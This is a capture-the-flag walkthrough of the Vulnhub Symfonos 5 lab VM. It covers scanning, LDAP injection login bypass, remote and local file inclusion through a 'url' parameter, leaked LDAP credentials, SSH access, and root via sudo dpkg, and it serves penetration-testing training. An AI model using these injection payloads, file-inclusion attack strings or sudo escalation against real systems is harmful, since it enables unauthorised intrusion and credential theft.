Vulnhub: Symfonos 5

Vulnhub: Symfonos 5

What happened to Symfonos 4? Sorry, but for some unbeknownst reasons beyond the cosmos, I could not get target VM working in lab.

General Information / Brief

Another target from the Symfonos series. The vulnerability of exploiting service in this target (LDAP injection) may sound out of scope in name, but actual exploitation is similar (even identical) to another service vulnerability - SQL injection. Imagine a scenario remote stack-base buffer overflow to a FTP server, compared to POP3 server - different service, similar concept and overall lesson can be applied to operators training.

Scope

Forth runner up in the series will target Symfonos 5 - noted author description: "based machine designed to teach people the importance of understanding from the interior." is accurate and demonstrates continuation of enumeration and variety of exploitation technique to achieve objective - information leak exist, operator just needs to find it.

Reconnaissance


Target Address
Symfonos 5 192.168.234.140

Quick initial scan on target to note open ports and services.

rustscan -a 192.168.234.140 -- -sC -sV

Initial scan result.

$ rustscan -a 192.168.234.140 -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
...
Open 192.168.234.140:22
Open 192.168.234.140:80
Open 192.168.234.140:389
Open 192.168.234.140:636
[~] Starting Script(s)
...
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
...
80/tcp  open  http     syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...

Nmap scan each ports for service and default nmap script.

nmap -sC -sV -p22,80,389,636 192.168.234.140
  • -sC: run default nmap scripts
  • -sV: detect service version

We get back the following result showing that 04 ports are open:

  • Port 22: OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
  • Port 80: Apache httpd 2.4.29 ((Ubuntu))
  • Port 389: OpenLDAP 2.2.X - 2.3.X
  • Port 636: ldapssl?

Initial nmap service and script scan result.

Check - Same result as above.

Before probing ports - re-run and re-check with full nmap scan in background session for full report.

nmap -sC -sV -O -p- 192.168.234.140
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS

We get back the following result showing that 00 ports are open: No new ports to report.

None.

Run an nmap scan with the -sU flag enabled to run a UDP scan.

nmap -sU --top-port 1000 192.168.234.140

We get back the following result showing that 01 ports are open:

  • Port 137: dhcpc (Filtered)

Reports back the following result.

# nmap -sU --top-port 1000 192.168.234.140
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 02:38 EDT
Nmap scan report for 192.168.234.140
Host is up (0.00031s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 00:0C:29:25:50:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1011.99 seconds

Enumeration


Port 389/636 - LDAP

Probing the target port with nmap LDAP scripts scan and noted target LDAP distinguished name in namingContexts list the domain name - dc=symfonos,dc=local. On operator workstation, edit file /etc/hosts and insert 192.168.234.140 symfonos.local to avoid resolve issues.

$ nmap -n -sV -p389,636 --script=ldap* 192.168.234.140
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 04:07 EDT
Nmap scan report for 192.168.234.140
Host is up (0.00024s latency).

Bug in ldap-brute: no string output.
PORT    STATE SERVICE  VERSION
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|       supportedSASLMechanisms: SCRAM-SHA-1
|       supportedSASLMechanisms: SCRAM-SHA-256
|       supportedSASLMechanisms: GS2-IAKERB
|       supportedSASLMechanisms: GS2-KRB5
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema
636/tcp open  ldapssl?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

Operator can also probe with the ldapsearch tool using the -s flag to specify the scope (base, one, sub, or children) of the search and confirm report of target LDAP 'namingContexts' as dc=symfonos,dc=local.

ldapsearch -H ldap://192.168.234.140 -x -s base namingcontexts

image1-1

Anonymous authentication checks without binding to any user account can be done with the following command, using the -b flag and specifying the distinguished name to expand the search base. Not specifying any filters - by default will search all object classes of target LDAP directory tree (Dump all, sort later).

$ ldapsearch -x -H ldap://192.168.234.140 -b "dc=symfonos,dc=local"

# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 32 No such object

Returned result verified anonymous login is enabled, but has not dump any useful information.

Port 80 - HTTP

Probing the target port - front end view.

image2-1

Viewing source contains a single zeus.jpg - contains no data information via exiftool. Directory and extension scan yield the following report.

$ feroxbuster --url http://192.168.234.140 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html,cgi,sh,bak -f -d 2 -C 403,404

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.234.140
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 💢  Status Code Filters   │ [403, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php, txt, html, cgi, sh, bak]
 🏁  HTTP methods          │ [GET]
 🪓  Add Slash             │ true
 🔃  Recursion Depth       │ 2
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       18l       21w      207c http://192.168.234.140/
200      GET       39l       79w     1650c http://192.168.234.140/admin.php/
302      GET       28l       61w      962c http://192.168.234.140/home.php => admin.php
200      GET       18l       21w      207c http://192.168.234.140/index.html
302      GET        0l        0w        0c http://192.168.234.140/logout.php => admin.php
200      GET      815l     3019w    36057c http://192.168.234.140/icons/README.html
200      GET       20l       96w     1746c http://192.168.234.140/static/

Probe directory extension /static reports directory listing with image files.

image3-1

Extracted data from all zeus jpg file - contains no data information via exiftool. Note file extensions home.php and logout.php points to admin.php. Probing /admin.php report a administrator panel - application vender or version unknown. Brute force with known default credential sets failed.

image4-1

Initial Access


Exploitation Synopsis:

In this exercise - operator will gain access to admin login panel via LDAP injection, exploit admin control panel local file inclusion vulnerability to leak credentials to target LDAP service and dump data for credentials to gain initial access shell session on target.

Exploitation Incident Report:

Probing target login form /admin.php for vender or version information leak failed, fuzzing session with SQL injection payload did not yield result. Note target has LDAP service active on port 389 and 636 - operator can check for LDAP injection.

Exploitation (LDAP Injection - Fuzz)

In the following task - operator will fuzz /admin.php administrator panel for LDAP injection with burp suite and wfuzz (demonstration only - tool choice is option-free).

Burp suite:

Capture login session to administrator panel, intercept is a standard GET PHP file with username and password parameter.

image5-1

Send to intruder. Fuzzing session should have execution checklist order for accurate result - it is advise that operator should start with username field, then password field, then username and password field.

image6-1

Insert wordlist and start attack.

Note:

  • Utilizing seclist LDAP wordlist at /usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt did not yield any result. (sudo apt install seclists)
  • During research phase yielded additional payload wordlist from a user on github, but as of time writing this article - user is no longer hosting the wordlist repo.
  • Instead - reader can utilize payload wordlist from Hacktricks/ldap-injection. (Confirmed same wordlist from user on github, appended to seclist LDAP.Fuzzing.txt wordlist.)
  • Recommended, but option-free to update seclist LDAP.Fuzzing.txt wordlist with new version from Hacktricks/ldap-injection.

Invalid error returns 200 responses, with first 302 response on payload string*))%00 and all request afterwards are trailed with 302 response.

image7-1

Changing resource pool to maximum of 1 request and relaunching fuzz did not change 302 trailing response afterwards. Target web application assigned current cookie session as being valid login and any request afterward is also valid. Test can be done by forwarding current intercept session to target --> automatically bypass login.

wfuzz:

To utilize wfuzz tool, retrieve the url field during known default credential checks.

image8-1

Operator can fuzz parameter field to check LDAP injection vulnerability, starting with the username field.

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt -u "http://symfonos.local/admin.php?username=FUZZ&password=password"

Return result with 302 response on payload string *))%00.

image9-1

Fuzzing both username and password field returns the following result.

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt -u "http://symfonos.local/admin.php?username=FUZZ&password=FUZZ"

image10-1

Note payload string *))%00 and * in both username and password field are valid bypass. The 302 code in HTTP protocol is considered resource redirect response - in this task, a valid response will redirect to internal dashboard panel at extension /home.php.

Exploitation (LDAP Injection - Bypass)

With list of bypass attack string, option-free for operator to inject into panel for bypass.

image11-1

File extension /home.php - access control panel.

image12-1

Exploitation (Access Control Panel - Analysis)

Analysis of control panel appears custom and 'Portraits' link contains same images from directory /static, but noted link url - instead of linking to file extension portraits.php, it used file extension home.php url request parameter and is pointed internally at lookback address to retrieve protraits.php.

image13-1

Viewing source confirms link is hardcoded and using home.php url parameter instead of linking local portraits.php file.

image14-1

Profile report points to possible file inclusion (remote and/or local) vulnerability.

Exploitation (Access Control Panel - File Inclusion)

Remote File Inclusion - Proof-of-Concept:

In this concept - operator can test remote file inclusion by repurposing the url parameter and point address to HTTP listening post on operator workstation. Activate, point and browse to listening post HTTP address.

http://symfonos.local/home.php?url=http://192.168.234.133/test

Response from listening post confirms remote file inclusion vulnerability and target is requesting resource via HTTP GET request.

image15-1

Remote File Inclusion - Command Execution:

Remote file inclusion can force target web application to include arbitrary code files imported from another location - in this task, remote location on operator listening post HTTP and importing a payload file executing operating system commands. Generate PHP payload file - cmd.php to execute shell commands and echo result.

<?php echo shell_exec("whoami");?>

Craft attack string to append request to listening post HTTP /cmd.php extension - send it.

http://symfonos.local/home.php?url=http://192.168.234.133/cmd.php

Return resulted in valid request to listening post payload file, but no command execution result displayed. Viewing the source code and noted whole PHP payload code displayed and not executed.

image16-1

Task has failed as target does not render PHP code or possibly disabled PHP engine.

Local File Inclusion - Proof-of-Concept:

With possibility to view PHP payload file, next task is to attempt to view local files on target. Operator can retrieve target /etc/passwd file with the following attack string.

http://symfonos.local/home.php?url=/etc/passwd

Return result confirms target vulnerable to local file inclusion.

image17-1

Note: View source to prettify return output.

Local File Inclusion - Internal Analysis:

Operator was not able to locate target log files for poisoning (no permission or location not default). With vulnerability to view PHP file without rendering via PHP engine - operator can review PHP files on web root from HTTP external analysis report. Analysis of PHP file home.php activated HTML portion and caused double panel view without source code result.

image18-1

View-source: home.php to display PHP source code. No useful information to report.

image19-1

Analysis of PHP file admin.php file yield LDAP configuration open in plain text. The 'authLdap' function connects and bind to a remote LDAP server utilizing hardcoded credential.

image20-1

Possible admin credentials (LDAP):

Username: cn=admin,dc=symfonos,dc=local
Password: qMDdyZh3cT6eeAWD
Exploitation (Remote Access - LDAP)

With possible credentials, operator can probe target LDAP service to test credential via ldapsearch or nmap script ldap-search. (Option-free.)

ldapsearch -x -H ldap://192.168.234.140 -D "cn=admin,dc=symfonos,dc=local" -w "qMDdyZh3cT6eeAWD" -b "DC=symfonos,DC=local"
nmap --script ldap-search --script-args 'ldap.username="admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"' -p389,636 192.168.234.140

image21-1

Noted base64 encoded string in userPassword field for user admin (LDAP administrator) and user zeus. Current access is utilizing admin credentials, targeting user zeus and base64 decode returns the following result.

$ echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d                            
cetkKf4wCuHC9FET   

Return result in possible credential for user zeus.

Password: cetkKf4wCuHC9FET

Note: Using nmap ldap-search script has ability to auto decode base64 portion.

image22-1

Exploitation (Remote Access - SSH)

LDAP analysis under user zeus mentions loginSHell: /bin/bash. With possible credentials and only entry point left on target is via SSH - operator can attempt interactive connection on target for initial access.

ssh zeus@symfonos.local
cetkKf4wCuHC9FET

image23-1

Successful exploitation should yield session as user zeus privilege.

Privilege Escalation


Exploitation Synopsis:

In this exercise - operator will utilize access to target user session to exploit misconfigured sudo access to elevate privilege to superuser.

Exploitation Incident Report:

Internal analysis of current session - check sudo listing and noted /usr/bin/dpkg set to root privilege with no password required.

image24-1

Check GTFObin/dpkg advisory guide list - section sudo. Exploitation to elevate privilege can be done with the following command sets:

  • sudo dpkg -l
  • !/bin/sh (Used !/bin/bash in this task.)
  • First command list packages install on target system and is too long to fit in screenshot.

image25-1

Successful exploitation should elevate session to user root privilege.

Proof

image26-1

Exploitation Post-Incident Report


  • Injection Bypass (methodology procedures to follow):
    • If target has a web portal with credential requirement and target has SQL ports, try SQL injection.
    • If target has a web portal with credential requirement and target has LDAP ports, try LDAP injection.
  • Injection Bypass (Fuzzing) - Each tools has it pros/cons and knowing how to use all to perform same task can sometime be a cure to your insanity check. (No trailing 302 response on target using wfuzz.)

Spelling, errors or any other issues to report. Please - be kind and let me know.

Until then...

spellcheck-1